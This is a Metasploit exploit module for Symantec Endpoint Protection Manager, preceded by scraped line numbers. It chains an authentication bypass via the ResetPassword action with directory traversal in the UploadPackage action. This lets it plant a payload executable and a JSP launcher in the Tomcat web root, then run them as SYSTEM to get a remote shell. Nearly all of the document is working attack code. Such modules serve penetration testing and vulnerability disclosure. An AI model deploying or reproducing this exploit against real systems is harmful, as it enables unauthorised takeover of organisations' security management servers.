1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
'Description' => %q{
This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
include an authentication bypass, a directory traversal and a privilege escalation to
get privileged code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Markus Wulftange', #discovery
'bperry' # metasploit module
],
'References' =>
[
['CVE', '2015-1486'],
['CVE', '2015-1487'],
['CVE', '2015-1489'],
['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
],
'DefaultOptions' => {
'SSL' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic',
{
'Arch' => ARCH_X86,
'Payload' => {
'DisableNops' => true
}
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Jul 31 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8443),
OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
], self.class)
end
def exploit
meterp = Rex::Text.rand_text_alpha(10)
jsp = Rex::Text.rand_text_alpha(10)
print_status("#{peer} - Getting cookie...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_post' => {
'ActionType' => 'ResetPassword',
'UserID' => 'admin',
'Domain' => ''
}
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
end
cookie = res.get_cookies
if cookie.nil? || cookie.empty?
fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
end
exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
}
print_status("#{peer} - Uploading payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => {
'ActionType' => 'BinaryFile',
'Action' => 'UploadPackage',
'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
'KnownHosts' => '.'
},
'data' => payload.encoded_exe,
'cookie' => cookie,
'ctype' => ''
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end
register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")
print_status("#{peer} - Uploading JSP page to execute the payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => {
'ActionType' => 'BinaryFile',
'Action' => 'UploadPackage',
'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
'KnownHosts' => '.'
},
'data' => exec,
'cookie' => cookie,
'ctype' => ''
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end
register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")
print_status("#{peer} - Executing payload. Manual cleanup will be required.")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
}, 5)
end
end
|